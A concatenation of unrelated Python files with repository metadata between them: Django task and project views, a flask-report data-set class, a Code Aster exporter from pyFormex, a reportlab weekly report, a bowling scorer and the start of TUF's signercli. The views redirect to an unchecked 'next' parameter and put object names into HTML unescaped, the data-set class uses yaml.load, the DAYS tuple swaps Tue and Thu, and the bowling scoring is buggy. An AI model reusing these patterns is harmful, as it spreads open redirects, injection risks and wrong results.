class TaskDetailView(DetailView):
model = Task
template_name = "proman/task_detail.html"
context_object_name = "task"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(TaskDetailView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
form = TaskCloseForm(instance=self.object)
form.initial = {"completed_dt": START_DT_INITIAL}
context = super(TaskDetailView, self).get_context_data(**kwargs)
context['close_form'] = form
context['task_logs'] = LogEntry.objects.filter(object_id=self.object.pk, content_type = ContentType.objects.get_for_model(self.object).pk).order_by('-action_time')
return context
class ProjectCreateView(CreateView):
"""
Creates a Project
"""
form_class = ProjectForm
template_name = "proman/project_update.html"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProjectCreateView, self).dispatch(*args, **kwargs)
def get_initial(self):
super(ProjectCreateView, self).get_initial()
user = self.request.user
self.initial = {"owner":user.id, "start_dt": START_DT_INITIAL, "end_dt": END_DT_INITIAL}
return self.initial
def form_valid(self, form):
self.object = form.save(commit=False)
change_message = "added this project"
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = ADDITION,
change_message = change_message
)
messages.success(self.request, "Successfully added this new project, <strong>%s</strong>." % self.object.name, extra_tags='success')
return HttpResponseRedirect(reverse('project_detail', args=[self.object.pk]))
def get_success_url(self):
if self.request.GET.has_key('next'):
return self.request.GET['next']
return self.object.get_absolute_url()
class ProjectUpdateView(UpdateView):
"""
Updates a Project
"""
form_class = ProjectForm
template_name = "proman/project_update.html"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProjectUpdateView, self).dispatch(*args, **kwargs)
def get_object(self, **kwargs):
obj = get_object_or_404(Project, pk=self.kwargs['pk'])
return obj
def form_valid(self, form):
self.object = form.save(commit=False)
orig = Project.objects.get(pk=self.object.pk)
new_obj = orig
new_obj.pk = None
new_obj.editor = self.request.user.profile
new_obj.version = True
new_obj.save()
self.object.save()
change_message = get_project_change_message(orig, self.object)
LogEntry.objects.log_action(
user_id = self.request.user.pk,
content_type_id = ContentType.objects.get_for_model(self.object).pk,
object_id = self.object.pk,
object_repr = force_unicode(self.object),
action_flag = CHANGE,
change_message = change_message
)
return HttpResponseRedirect(self.get_success_url())
def get_success_url(self):
if self.request.GET.has_key('next'):
messages.success(self.request, 'Successfully updated the project <strong><a href="%s">%s</a></strong>.' % (self.object.get_absolute_url(), self.object.name), extra_tags='success project-%s' % self.object.pk)
return self.request.GET['next']
messages.success(self.request, 'Successfully updated this project.', extra_tags='success project-%s' % self.object.pk)
return self.object.get_absolute_url()
class ProjectListView(ListView):
model = Project
queryset = Project.objects.filter(version=False).exclude(status="Done").order_by('-status', 'start_dt')[:25]
context_object_name = "projects"
template_name = "proman/project_list.html"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProjectListView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
context = super(ProjectListView, self).get_context_data(**kwargs)
projects = Project.originals.exclude(status="Done").order_by('start_dt')
context['display'] = "open"
if self.request.GET.get('display'):
display = self.request.GET.get('display')
if display == "all":
context['display'] = display
projects = Project.originals.order_by('start_dt')
if display == "done":
context['display'] = display
projects = Project.originals.order_by('start_dt')
context['filtered_projects'] = projects
context['projects_total'] = projects.count()
context['results_paginate'] = "25"
context['technologies'] = projects.values('technology').annotate(total=Count('technology'))
context['projects'] = projects[:context['results_paginate']]
return context
def render_to_response(self, context):
"""Used to pull paginated items via a GET"""
if self.request.method == 'GET':
# if self.request.GET.get('project_page'):
# project_page = self.request.GET.get('project_page')
# paginator = Paginator(context['filtered_projects'], context['results_paginate'])
# projects = paginator.page(project_page).object_list
# return render_to_response("proman/project_table_items.html", locals(), context_instance=RequestContext(self.request))
if self.request.GET.get('project_search'):
project_count = self.request.GET.get('project_search')
current_count = self.request.GET.get('project_current')
projects = context['filtered_projects'][project_count:]
return render_to_response("proman/project_table_items.html", locals(), context_instance=RequestContext(self.request))
return render_to_response(self.template_name, context, context_instance=RequestContext(self.request))
class ProjectDetailView(DetailView):
model = Project
template_name = "proman/project_detail.html"
context_object_name = "project"
@method_decorator(login_required)
def dispatch(self, *args, **kwargs):
return super(ProjectDetailView, self).dispatch(*args, **kwargs)
def get_context_data(self, **kwargs):
project = self.object.pk
user = self.request.user
form = TaskMiniForm()
form.fields['owner'].initial = user.profile.id
form.fields['project'].initial = project
form.fields['due_dt'].initial = DUE_DT_INITIAL
form.fields['billable'].initial = True
context = super(ProjectDetailView, self).get_context_data(**kwargs)
project_tasks = Task.objects.filter(version=False, project=self.kwargs['pk'])
context['form'] = form
context['project_logs'] = LogEntry.objects.filter(object_id=self.object.pk, content_type = ContentType.objects.get_for_model(self.object).pk).order_by('-action_time')
return context
@login_required
def import_content(request, content_type=None, template_name="proman/import.html"):
if content_type not in ['clients', 'projects', 'users', 'client_contacts']:
raise Http404
ci = ContentImport.objects.create(content_type=content_type, starter=request.user.profile)
return HttpResponseRedirect(reverse('import_content_attempt', kwargs={'content_type': content_type, 'pk': int(ci.pk)}))
@login_required
def import_content_attempt(request, content_type=None, pk=None, template_name="proman/import.html"):
if content_type not in ['clients', 'projects', 'users', 'client_contacts']:
raise Http404
ci = get_object_or_404(ContentImport, pk=pk)
if not ci.create_dt:
ci.create_dt = timezone.now()
ci.save()
command = 'import_harvest_%s' % ci.content_type
subprocess.Popen(["python", "manage.py", command, str(ci.pk)])
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
@login_required
def import_check(request, pk=None, template_name="proman/import_check.html"):
"""
Check the import record for matched, added, total, and completeness.
Also create the percentage for the bar graph. Render all of these in a hidden
div in a template to be reformatted and displayed by javascript
"""
if pk:
matched = cache.get(('content_import.matched.%s') % pk)
added = cache.get(('content_import.added.%s') % pk)
total = cache.get(('content_import.total.%s') % pk)
complete_dt = cache.get(('content_import.complete_dt.%s') % pk)
perc = 0
if total > 0:
perc = int(round((matched + added)*100/total))
return render_to_response(template_name, locals(), context_instance=RequestContext(request))
UTF-8
Python
false
false
2,012
15,788,299,821,622
37417de80f0651d41ab66f5692db30fcf5ffefb0
d8ba9cce6373a4bcafff442feb1500b6b63d638c
/flask_report/data_set.py
ae18ffd8d20cd3a86075c329d9c5f2cdeb734573
[]
no_license
pbehnke/flask-report
https://github.com/pbehnke/flask-report
2b67d2c819d9539b86d18ec6b5f884b4a1c4abf0
90a038799d49825e7f88bcc82bc5e8f15c7cacb2
refs/heads/master
2021-05-28T03:32:10.223086
2014-11-20T13:41:40
2014-11-20T13:41:40
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding: UTF-8 -*-
import os
import operator
import yaml
from import_file import import_file
from werkzeug.utils import cached_property
import sqlalchemy
from flask.ext.babel import _
from flask.ext.report.utils import get_column, get_primary_key
class DataSet(object):
'''
data set defines the source of data
'''
__TYPES__ = {
"str": "text",
"int": "number",
"bool": "checkbox",
"datetime": "datetime",
"date": "date"
}
def __init__(self, flask_report, id_):
self.flask_report = flask_report
self.id_ = id_
data_set_meta_file = os.path.join(self.flask_report.data_set_dir,
str(id_), 'meta.yaml')
data_set_meta = yaml.load(file(data_set_meta_file).read())
self.name = data_set_meta['name']
self.creator = data_set_meta.get('creator')
self.create_time = data_set_meta.get('create_time')
self.description = data_set_meta.get("description")
self.default_report_name = data_set_meta.get("default_report_name", '')
self.__special_chars = {"gt": operator.gt, "lt": operator.lt,
"ge": operator.ge, "le": operator.le,
"eq": operator.eq, "ne": operator.ne}
self._filters = data_set_meta.get("filters", {})
@cached_property
def query(self):
'''
the query of data set
'''
query_def_file = os.path.join(self.flask_report.data_set_dir,
str(self.id_), "query_def.py")
lib = import_file(query_def_file)
return lib.get_query(self.flask_report.db, self.flask_report.model_map)
@cached_property
def columns(self):
'''
get the columns
:return list: a list of column, each one is a dict, contains then
following keys:
* idx - the index of the column, start from 0
* name - name of the column
* key - key of the column, eg. column name defined in table
* expr - the column definition in model
for exampe, for query like:
db.session.query(User.id, User.name.label('username'))
and User.__tablename__ is 'TB_USER'
the columns will be:
[
{
idx: 0,
name: 'User.id',
key: 'TB_USER.id',
expr: User.id
},
{
idx: 1,
name: 'username',
key: 'TB_USER.name',
expr: User.name.label('username')
},
]
'''
def _make_dict(idx, c):
if hasattr(c['expr'], 'element'): # is label
name = c['name'] or dict(name=str(c['expr']))
key = str(c['expr'].element)
if isinstance(c['expr'].element,
sqlalchemy.sql.expression.Function):
key = key.replace('"', '')
else:
if hasattr(c['expr'], '_sa_class_manager'): # is a model class
key = c['expr'].__tablename__
name = c['expr'].__name__
else:
name = str(c['expr'])
key = c['expr'].table.name + "." + c['expr'].name
# TODO need key?
return dict(idx=idx, name=name, key=key, expr=c['expr'])
return tuple(_make_dict(idx, c) for idx, c in
enumerate(self.query.column_descriptions))
def _search_label(self, column):
for c in self.columns:
if c["key"] == str(column.expression) or \
c["expr"] == column:
return c["name"]
raise ValueError(_('There\'s no such column ' + str(column)))
def _coerce_type(self, column):
default = column.type.python_type
return self.__TYPES__.get(default.__name__, 'text')
@property
def filters(self):
'''
a list filters
'''
filters = []
for k, v in self._filters.items():
column = get_column(k, self.columns, self.flask_report)
result = {
"name": v.get('name', self._search_label(column)),
"col": k,
"ops": v.get("operators"),
'opts': [],
'synthetic': False,
}
if hasattr(column, "property") and hasattr(column.property,
"direction"):
model = column.property.mapper.class_
pk = get_primary_key(model)
def _iter_choices(column):
for row in self.flask_report.db.session.query(model):
yield getattr(row, pk), unicode(row)
remote_side = column.property.local_remote_pairs[0][0]
result["opts"] = list(_iter_choices(column))
result['type'] = v.get('type',
self._coerce_type(remote_side))
else:
result['type'] = v.get('type', self._coerce_type(column))
filters.append(result)
for k, f in self.synthetic_filter_map.items():
filters.append({
'name': f.name,
'col': f.name,
'ops': f.operators,
'type': f.type,
'opts': f.options,
'synthetic': True,
})
return filters
@property
def synthetic_filter_map(self):
'''
a map of synthetic (user defined) filters, keys are filters'name, values
are filters
'''
synthetic_filter_file = os.path.join(self.dir, 'synthetic_filters.py')
ret = {}
if os.path.exists(synthetic_filter_file):
lib = import_file(synthetic_filter_file)
for filter_ in lib.__all__:
ret[filter_.name] = filter_
return ret
@property
def dir(self):
'''
the path of the directory where data set is defined
'''
return os.path.join(self.flask_report.data_set_dir, str(self.id_))
def get_current_filters(self, currents):
# TODO what is this method for?
def _match(to_matcher):
result = to_matcher.copy()
for filter in self.filters:
if to_matcher["col"] == filter["col"]:
result.update(filter)
return result
all = []
for current in currents:
filter_ = _match(current)
if filter_:
try:
filter_["val"] = int(filter_["val"])
except ValueError:
pass
all.append(filter_)
return all
#!/usr/bin/env python
#! coding: utf-8
dict = {"a" : "apple", "b" : "banana", "g" : "grape", "o" : "orange"}
print dict
dict["w"] = "watermelon"
print dict
del(dict["a"])
print dict
#字典遍历
for k in dict:
print "dict[%s] =" % k,dict[k]
#每个元素是一个key和value组成的元组,以列表的方式输出
print dict.items()
#调用items()实现字典的遍历
for (k, v) in dict.items():
print "dict[%s] =" % k, v
#输出key的列表
print dict.keys()
#输出value的列表
print dict.values()
UTF-8
Python
false
false
2,013
16,870,631,557,461
d570df1637b6d4da2395fd6cf3bac7176d310277
76de4fc4f00a04c8c9acc1e9e4a5fae12cf0c08a
/trunk/pyformex/plugins/fe_ast.py
6ffdd88d84c6104ce26a4efaf8facc192b45daa0
[]
no_license
BackupTheBerlios/pyformex-svn
https://github.com/BackupTheBerlios/pyformex-svn
ec2361b1b9967918be65e892217a691a6f8b145d
f5404809095711334bbb938d9d119a69ad8fc260
refs/heads/master
2020-12-24T13:20:47.422165
2011-11-15T11:52:23
2011-11-15T11:52:23
40,749,266
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env pyformex
##
## This file is part of pyFormex 0.8.5 Sun Nov 6 17:27:05 CET 2011
## pyFormex is a tool for generating, manipulating and transforming 3D
## geometrical models by sequences of mathematical operations.
## Home page: http://pyformex.org
## Project page: https://savannah.nongnu.org/projects/pyformex/
## Copyright (C) Benedict Verhegghe ([email protected])
## Distributed under the GNU General Public License version 3 or later.
##
##
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 3 of the License, or
## (at your option) any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with this program. If not, see http://www.gnu.org/licenses/.
##
"""Exporting finite element models in code Aster file formats (.mail and .comm).
"""
from plugins.fe_abq import fmtData
from plugins.properties import *
from plugins.fe import *
from mydict import Dict,CDict
import pyformex as pf
from datetime import datetime
import os,sys
def astInputNames(job,extension='mail'):
"""Returns corresponding Code Aster input filename.
job should be a jobname, with or without directory part, but without extension
The extension can be mail or comm.
The jobname is the basename without the extension and the directory part.
The filename is the abspath of the job with extension.
"""
jobname = os.path.basename(job)
filename = os.path.abspath(job)
if extension in ['mail','comm']:
filename += '.%s' % extension
else:
raise ValueError,"Extension should be mail or comm"
return jobname,filename
def nsetName(p):
"""Determine the name for writing a node set property."""
if p.name is None:
return 'Nall'
else:
return p.name
def esetName(p):
"""Determine the name for writing an element set property."""
if p.name is None:
return 'Eall'
else:
return p.name
def writeNodes(fil,nodes,type,name=None):
"""Write nodal coordinates.
Type can be 2D or 3D.
"""
if not type in ['2D','3D']:
raise ValueError,"Type should be 2D or 3D"
out = 'COOR_%s' % type
if name is not None:
out += ' nom = %s' % name
fil.write('%s\n'% out)
if type == '2D':
nodes = nodes[:,:2]
nn = nodes.shape[1]
fmt = 'N%d' + nn*' %14.6e' + '\n'
for i,n in enumerate(nodes):
fil.write(fmt % ((i,)+tuple(n)))
fil.write('FINSF\n')
fil.write('%\n')
def writeElems(fil,elems,type,name=None,eid=None,eofs=0,nofs=0):
"""Write element group of given type.
elems is the list with the element node numbers.
The elements are added to the named element set.
The eofs and nofs specify offsets for element and node numbers.
If eid is specified, it contains the element numbers increased with eofs.
"""
out = type
if name is not None:
out += ' nom = %s' % name
fil.write('%s\n'% out)
nn = elems.shape[1]
if nn < 5:
fmt = 'M%d' + nn*' N%d' + '\n'
else:
fl = nn/4
fmt = 'M%d' + fl*(4*' N%d' + '\n')
if nn%4 != 0:
fmt += (nn%4)*' N%d' + '\n'
if eid is None:
eid = arange(elems.shape[0])
else:
eid = asarray(eid)
for i,e in zip(eid+eofs,elems+nofs):
fil.write(fmt % ((i,)+tuple(e)))
fil.write('FINSF\n')
fil.write('%\n')
def writeSet(fil,type,name,set):
"""Write a named set of nodes or elements (type=NSET|ELSET)
`set` is a list of node/element numbers,
in which case the `ofs` value will be added to them.
"""
if type == 'NSET':
fil.write('GROUP_NO nom = %s\n' % name)
cap = 'N'
elif type == 'ELSET':
fil.write('GROUP_MA nom = %s\n' % name)
cap = 'M'
else:
raise ValueError,"Type should be NSET or ELSET"
for i in set:
fil.write('%s%d\n' % (cap,i))
fil.write('FINSF\n')
fil.write('%\n')
def fmtHeadingMesh(text=''):
"""Format the heading of the Code Aster mesh file (.mail)."""
out = """TITRE
Code Aster mail file created by %s (%s)
%s
FINSF
""" % (pf.Version,pf.Url,text)
return out
def fmtHeadingComm(text=''):
"""Format the heading of the Code Aster command file (.comm)."""
out = """#
# Code Aster command file created by %s (%s)
# %s
""" % (pf.Version,pf.Url,text)
return out
def fmtEquation(prop):
"""Format multi-point constraint using an equation
Required:
- name
- equation
Optional:
- coefficient
Equation should be a list, which contains the different terms of the equation.
Each term is again a list with three values:
- First value: node number
- Second value: degree of freedom
- Third value: multiplication coefficient of the term
The sum of the different terms should be equal to the coefficient.
If this coefficient is not specified, the sum of the terms should be equal to zero.
Example: P.nodeProp(equation=[[209,1,1],[32,1,-1]])
In this case, the displacement in Y-direction of node 209 and 32 should be equal.
"""
dof = ['DX','DY','DZ']
out = 'link = AFFE_CHAR_MECA(\n'
out += ' MODELE=Model,\n'
out += ' LIAISON_DDL=(\n'
for i,p in enumerate(prop):
l1 = ' _F(NOEUD=('
l2 = ' DDL=('
l3 = ' COEF_MULT=('
for j in p.equation:
l1 += '\'N%s\',' % j[0]
l2 += '\'%s\',' % dof[j[1]]
l3 += '%s,' % j[2]
out += l1 + '),\n' + l2 + '),\n' + l3 + '),\n'
coef = 0
if p.coefficient is not None:
coef = p.coefficient
out += ' COEF_IMPO=%s,),\n' % coef
out += ' ),\n'
out += ' );\n\n'
return out
def fmtDisplacements(prop):
"""Format nodal boundary conditions
Required:
- set
- name
- displ
Displ should be a list of tuples (dofid,value)
Set can be a list of node numbers, or a set name (string).
Example 1: P.nodeProp(set='bottom',bound=[(0,0),(1,0),(2,0)])
Example 2: P.nodeProp(name='rot',set=[2],bound=[(3,30)])
In the first example, the displacements of the nodes in the set 'bottom' are zero.
In the second example, a rotation is imposed around the X-axis on node number 2.
"""
dof = ['DX','DY','DZ','DRX','DRY','DRZ']
out = ''
for i,p in enumerate(prop):
out += 'displ%s = AFFE_CHAR_MECA(\n' % i
out += ' MODELE=Model,\n'
out += ' DDL_IMPO=\n'
out += ' _F(GROUP_NO=(\'%s\'),\n' % p.name.upper()
for j in p.displ:
out += ' %s=%s,\n' % (dof[j[0]],j[1])
out += ' ),\n'
out += ' );\n\n'
return out
def fmtLocalDisplacements(prop):
"""Format nodal boundary conditions in a local coordinate system
Required:
- name
- displ
- local
Displ should be a list of tuples (dofid,value)
Local is an angle, specified in degrees (SHOULD BE EXTENDED TO THREE ANGLES!!!)
The local cartesian coordinate system is obtained by rotating the global
coordinate system around the Z-axis over the specified angle.
Set can be a list of node numbers, or a set name (string).
"""
dof = ['DX','DY','DZ','DRX','DRY','DRZ']
out = 'locDispl = AFFE_CHAR_MECA(\n'
out += ' MODELE=Model,\n'
out += ' LIAISON_OBLIQUE=(\n'
for i,p in enumerate(prop):
for j in p.displ:
out += ' _F(GROUP_NO=(\'%s\'),\n' % p.name.upper()
out += ' ANGL_NAUT=%s,\n' % p.local
out += ' %s=%s),\n' % (dof[j[0]],j[1])
out += ' ),\n'
out += ' );\n\n'
return out
materialswritten=[]
def fmtMaterial(mat):
"""Write a material section.
"""
if mat.name is None or mat.name in materialswritten:
return ""
out = '%s = DEFI_MATERIAU(\n' % mat.name
materialswritten.append(mat.name)
print materialswritten
if mat.elasticity is None or mat.elasticity == 'linear':
if mat.poisson_ratio is None and mat.shear_modulus is not None:
mat.poisson_ratio = 0.5 * mat.young_modulus / mat.shear_modulus - 1.0
out += ' ELAS=_F(E=%s,NU=%s),\n' % (float(mat.young_modulus),float(mat.poisson_ratio))
if mat.plastic is not None:
mat.plastic = asarray(mat.plastic)
if mat.plastic.ndim != 2:
raise ValueError,"Plastic data should be 2-dim array"
out1 = 'SIGMF=DEFI_FONCTION(\n'
out1 += ' NOM_PARA=\'EPSI\',\n'
out1 += ' VALE=(\n'
for i in mat.plastic:
out1 += ' %s,%s,\n' % (i[0],i[1])
out1 += ' ),\n'
out1 += ' );\n\n'
out += ' TRACTION=_F(SIGM=SIGMF,),\n'
out = out1 + out
out += ' );\n\n'
return out
solid3d_elems = [
'HEXA8',]
def fmtSections(prop):
"""Write element sections.
prop is a an element property record with a section and eltype attribute
"""
out1 = 'Model=AFFE_MODELE(\n'
out1 += ' MAILLAGE=Mesh,\n'
out1 += ' AFFE=(\n'
out2 = ''
out3 = 'Mat=AFFE_MATERIAU(\n'
out3 += ' MODELE=Model,\n'
out3 += ' MAILLAGE=Mesh,\n'
out3 += ' AFFE=(\n'
for p in prop:
setname = esetName(p)
el = p.section
eltype = p.eltype.upper()
mat = el.material
out1 += ' _F(GROUP_MA=\'%s\',\n' % setname.upper()
out1 += ' PHENOMENE=\'MECANIQUE\',\n'
out3 += ' _F(GROUP_MA=\'%s\',\n' % setname.upper()
if mat is not None:
out2 += fmtMaterial(mat)
############
## 3DSOLID elements
##########################
if eltype in solid3d_elems:
if el.sectiontype.upper() == '3DSOLID':
out1 += ' MODELISATION=\'3D\'),\n'
out3 += ' MATER=%s),\n' % mat.name
out1 += ' ),\n'
out1 += ' );\n\n'
out3 += ' ),\n'
out3 += ' );\n\n'
return out1 + out2 + out3
class AstData(object):
"""Contains all data required to write the Code Aster mesh (.mail) and command (.comm) files.
- `model` : a :class:`Model` instance.
- `prop` : the `Property` database.
- `steps` : a list of `Step` instances.
- `res` : a list of `Result` instances.
- `out` : a list of `Output` instances.
- `bound` : a tag or alist of the initial boundary conditions.
The default is to apply ALL boundary conditions initially.
Specify a (possibly non-existing) tag to override the default.
"""
def __init__(self,model,prop,nprop=None,eprop=None,steps=[],res=[],out=[],bound=None,type='3D'):
"""Create new AstData."""
if not isinstance(model,Model) or not isinstance(prop,PropertyDB):
raise ValueError,"Invalid arguments: expected Model and PropertyDB, got %s and %s" % (type(model),type(prop))
self.model = model
self.prop = prop
self.nprop = nprop
self.eprop = eprop
self.bound = bound
self.steps = steps
self.res = res
self.out = out
self.type = type
def writeMesh(self,jobname=None,header=''):
"""Write a Code Aster mesh file (.mail).
"""
# Create the Code Aster mesh file
if jobname is None:
jobname,filename = 'Test',None
fil = sys.stdout
else:
jobname,filename = astInputNames(jobname,extension='mail')
fil = file(filename,'w')
pf.message("Writing mesh to file %s" % (filename))
fil.write(fmtHeadingMesh("""Model: %s Date: %s Created by pyFormex
Script: %s
%s
""" % (jobname, datetime.now(), pf.scriptName, header)))
# write coords
nnod = self.model.nnodes()
pf.message("Writing %s nodes" % nnod)
writeNodes(fil,self.model.coords,self.type)
# write elements
pf.message("Writing elements and element sets")
telems = self.model.celems[-1]
nelems = 0
for p in self.prop.getProp('e'):
if p.set is not None:
# element set is directly specified
set = p.set
elif p.prop is not None:
# element set is specified by eprop nrs
if self.eprop is None:
raise ValueError,"elemProp has a 'prop' field but no 'eprop' was specified"
set = where(self.eprop == p.prop)[0]
else:
# default is all elements
set = range(telems)
setname = esetName(p)
if p.has_key('eltype'):
print('Writing elements of type %s: %s' % (p.eltype,set))
gl,gr = self.model.splitElems(set)
elems = self.model.getElems(gr)
elnrs = array([]).astype(int)
els = array([]).astype(int)
for i in elems:
nels = len(i)
if nels > 0:
els = append(els,i).reshape(-1,i.shape[1])
nelems += nels
writeElems(fil,els,p.eltype,name=setname,eid=set)
pf.message("Writing element sets")
writeSet(fil,'ELSET',setname,set)
pf.message("Total number of elements: %s" % telems)
if nelems != telems:
pf.message("!! Number of elements written: %s !!" % nelems)
# write node sets
pf.message("Writing node sets")
for p in self.prop.getProp('n',attr=['set']):
if p.set is not None:
# set is directly specified
set = p.set
elif p.prop is not None:
# set is specified by nprop nrs
if self.nprop is None:
raise ValueError,"nodeProp has a 'prop' field but no 'nprop' was specified"
set = where(self.nprop == p.prop)[0]
else:
# default is all nodes
set = range(self.model.nnodes())
setname = nsetName(p)
writeSet(fil,'NSET',setname,set)
## # write element sets
## pf.message("Writing element sets")
## for p in self.prop.getProp('e',noattr=['eltype']):
## if p.set is not None:
## # element set is directly specified
## set = p.set
## elif p.prop is not None:
## # element set is specified by eprop nrs
## if self.eprop is None:
## raise ValueError,"elemProp has a 'prop' field but no 'eprop' was specified"
## set = where(self.eprop == p.prop)[0]
## else:
## # default is all elements
## set = range(telems)
## setname = esetName(p)
## writeSet(fil,'ELSET',setname,set)
fil.write('FIN')
if filename is not None:
fil.close()
pf.message("Wrote Code Aster mesh file (.mail) %s" % filename)
def writeComm(self,jobname=None,header=''):
global materialswritten
materialswritten = []
# Create the Code Aster command file
if jobname is None:
jobname,filename = 'Test',None
fil = sys.stdout
else:
jobname,filename = astInputNames(jobname,extension='comm')
fil = file(filename,'w')
pf.message("Writing command to file %s" % (filename))
fil.write(fmtHeadingComm("""Model: %s Date: %s Created by pyFormex
# Script: %s
# %s
#
""" % (jobname, datetime.now(), pf.scriptName, header)))
fil.write('DEBUT();\n\n')
fil.write('Mesh=LIRE_MAILLAGE(INFO=2,);\n\n')
prop = self.prop.getProp('e',attr=['section','eltype'])
if prop:
pf.message("Writing element sections")
fil.write(fmtSections(prop))
prop = self.prop.getProp('n',attr=['displ'],noattr=['local'])
if prop:
pf.message("Writing displacement boundary conditions")
fil.write(fmtDisplacements(prop))
prop = self.prop.getProp('n',attr=['local'])
if prop:
pf.message("Writing local displacement boundary conditions")
fil.write(fmtLocalDisplacements(prop))
prop = self.prop.getProp('n',attr=['equation'])
if prop:
pf.message("Writing constraint equations")
fil.write(fmtEquation(prop))
fil.write('FIN();\n')
if filename is not None:
fil.close()
pf.message("Wrote Code Aster command file (.comm) %s" % filename)
# End
UTF-8
Python
false
false
2,011
10,153,302,707,876
eea73743a272f1f879e2fec531ac4e255e9706c8
2b65ea4d49ea321bdcf40b7202c1382ce98ff46f
/report.py
f2b63414683caf0f7b475c9d1e6f7c8168216ed4
[]
no_license
bgnori/activity-report
https://github.com/bgnori/activity-report
572d6a76c0c3e1a452a998ae6c08603c213fed02
b99f419a610d5bbd9b34e9da51bba0072561f023
refs/heads/master
2020-05-18T06:49:15.771735
2013-01-11T02:11:14
2013-01-11T02:11:14
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python
# -*- coding: utf-8 -*-
from reportlab.pdfgen import canvas
from reportlab.lib.pagesizes import A4
from reportlab.lib.units import mm
from reportlab.lib.styles import getSampleStyleSheet
from reportlab.lib.styles import ParagraphStyle
from reportlab.rl_config import defaultPageSize
from reportlab.lib import colors
from reportlab.platypus import SimpleDocTemplate, Paragraph, Spacer
from reportlab.platypus import PageTemplate
from reportlab.platypus import Table
from config import config
PAGE_HEIGHT = defaultPageSize[1]
PAGE_WIGTH = defaultPageSize[0]
styles = getSampleStyleSheet()
Title = "Hello Template"
pageinfo = "platypus example"
from reportlab.pdfbase import pdfmetrics
from reportlab.pdfbase.ttfonts import TTFont
pdfmetrics.registerFont(
TTFont(config['font']['name'], config['font']['path']))
styles['Normal'].fontName = config['font']['name']
styles.add(ParagraphStyle(name='TableCell',
parent=styles['Normal'],
fontSize=8,))
DAYS = ('Sun', 'Mon', 'Thu', 'Wed', 'Tue', 'Fri', 'Sat')
DAYS_JP = tuple(u'日月火水木金土')
from datetime import date
from datetime import time
from datetime import datetime
from datetime import timedelta
def srcmock(start, d, h):
return "%s"%(datetime.combine(start, time()) + d + h)
def week(start, src):
assert isinstance(start, date)
hours = [timedelta(hours=x) for x in range(5, 29)]
cellstyle = styles['TableCell']
corner = ['hour/day']
col_headers = DAYS_JP
rows_headers = corner + hours
xs = []
for i, _ in enumerate(col_headers):
d = timedelta(days=i)
x = ["%s"%(start+d,)] + [Paragraph(src(start, d, h), cellstyle) for h in hours]
xs.append(x)
data = [rows_headers] + xs
t = Table(zip(*data), colWidths=25*mm, rowHeights=9*mm)
t.setStyle([
('FONT', (0,0), (-1,-1), config['font']['name']),
('FONTSIZE', (0,0), (-1,-1), 8),
('GRID', (0,0), (-1, -1), 0.5, colors.black),
('TEXTCOLOR', (1,0), (1,0), colors.red),
('TEXTCOLOR', (7,0), (7,0), colors.blue)])
return t
def build(fname, start, src):
doc = SimpleDocTemplate(fname, pagesize=A4)
content = [Spacer(1, 5*mm)]
style = styles["Normal"]
content.append(week(start, src))
content.append(Spacer(1, 5*mm))
doc.build(content)
if __name__ == "__main__":
build(config['report']['test'],date.today(), srcmock)
UTF-8
Python
false
false
2,013
19,164,144,077,099
e168d669c56b675bf3c5d84ebeb68f117d1434d4
5985c08e7ec8f1f14d285cb2004e65625915805a
/bowling.py
dcb99643703d673ad04f57281eac21ca304842b6
[]
no_license
kebarr/bowling2
https://github.com/kebarr/bowling2
90475a12406fa72cb3143bf69aabe3be6d37a14d
148c57f67cd776c14ecadbedf5a8992e51972f42
refs/heads/master
2016-09-05T10:26:05.341412
2014-04-24T21:07:06
2014-04-24T21:07:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# use strategy james suggested: have scorecard as input then return it.
# to start with, have 1d list
# actually to pass gutter game, do bare minimum
def roll_ball(frame, pins):
if pins != 10:
return frame.append(pins)
elif len(frame) != 19 and len(frame) != 18:
frame.append(pins)
return frame.append(0)
else:
frame.append(pins)
# strike is next 2 pin falls, not possible rolls!
def score(frame):
# score for spares, check pairs
score = 0
print frame, len(frame)
for i in range(len(frame)):
score += frame[i]
if i%2 == 0 and i + 3 < len(frame):
if frame[i] + frame[i + 1] == 10:
if frame[i + 1] != 0:
score += frame[i + 2]
# else its a strike
elif frame[i + 2] != 10:
score += frame[i + 2]
score += frame[i + 3]
else:
score += frame[i + 2]
score += frame[i + 4]
return score
"""
<Program Name>
signercli.py
<Author>
Vladimir Diaz <[email protected]>
<Started>
April 5, 2012. Based on a previous version of this module by Geremy Condra.
<Copyright>
See LICENSE for licensing information.
<Purpose>
Provide an interactive command-line interface to create and sign metadata.
This script can be used to create all of the top-level role files required
by TUF, which include 'root.txt', 'targets.txt', 'release.txt', and
'timestamp.txt'. It also provides options to generate RSA keys, change the
encryption/decryption keys of encrypted key files, list the keyids of
the signing keys stored in a keystore directory, create delegated roles,
and dump the contents of signing keys (i.e., public and private keys, key
type, etc.)
This module can be best understood if read starting with the parse_option()
call in __main__. All of the options accept a single keystore
directory argument. Beyond this point, the script is interactive.
If any additional arguments is required, the user will be asked to input
these values. The script will process one command-line option and
raise an error for any other other options that might be supplied.
Initially, the 'quickstart.py' script is utilized when the repository is
first created. 'signercli.py' would then be executed to update the state
of the repository. For example, the repository owner wants to change the
'targets.txt' signing key. The owner would run 'signercli.py' to
generate a new RSA key, add the new key to the configuration file created
by 'quickstart.py', and then run 'signercli' to update the metadata files.
<Usage>
$ python signercli.py --<option> <keystore_directory>
Examples:
S python signercli.py --genrsakey ./keystore
